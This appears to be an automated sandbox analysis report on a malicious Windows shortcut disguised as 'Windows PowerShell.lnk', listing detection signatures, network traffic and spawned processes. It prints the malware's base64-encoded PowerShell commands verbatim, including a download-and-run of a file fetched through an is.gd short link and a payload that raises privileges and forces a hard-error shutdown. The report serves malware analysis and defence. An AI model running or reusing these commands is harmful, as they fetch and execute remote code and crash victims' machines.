Windows Analysis Report
Windows PowerShell.lnk

Overview

General Information

Sample name: Windows PowerShell.lnk
Analysis ID: 1526392
MD5: 02e1f1ea7dc301147433623d31e5a294
SHA1: b882f489808747b6201b113d306a42d533ca229e
SHA256: de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Performs an instant shutdown (NtRaiseHardError)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Compiles C# or VB.Net code
Connects to a URL shortener service
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Windows PowerShell.lnk ReversingLabs: Detection: 13%
Source: Windows PowerShell.lnk Virustotal: Detection: 19% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: Windows PowerShell.lnk Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Binary string: :C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.pdb source: powershell.exe, 0000004B.00000002.2248209888.000002145EE74000.00000004.00000800.00020000.00000000.sdmp
Connects to a URL shortener service
Source: unknown DNS query: name: is.gd
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.25.234.53 104.25.234.53
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View IP Address: 185.199.111.133 185.199.111.133
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdCookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /user-attachments/files/17251016/powershell.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdCookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /user-attachments/files/17251016/powershell.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: is.gd
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: objects.githubusercontent.com
Source: powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000004B.00000002.2248209888.000002145E474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49714 version: TLS 1.2

E-Banking Fraud
barindex
Malicious encrypted Powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE Jump to behavior

System Summary
barindex
Performs an instant shutdown (NtRaiseHardError)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Hard error raised: shutdown Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 75_2_00007FFD34575B94 NtRaiseHardError, 75_2_00007FFD34575B94
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 75_2_00007FFD345716C9 75_2_00007FFD345716C9
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3279
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3279 Jump to behavior
Source: pbkjdvqy.dll.76.dr, X.cs Base64 encoded string: 'RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw'
Source: classification engine Classification label: mal100.rans.bank.expl.evad.winLNK@131/13@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pmmnvk1.1fc.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: Windows PowerShell.lnk ReversingLabs: Detection: 13%
Source: Windows PowerShell.lnk Virustotal: Detection: 19%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 97
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 99
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 102
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 103
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 105
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 106
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 107
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 108
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 115
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 118
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 120
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 121
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 122
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 65
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 66
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 67
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 72
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 79
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 81
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 82
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 86
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 88
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 50
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 51
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 52
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 53
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 57
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 123
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 63
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 58
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 46
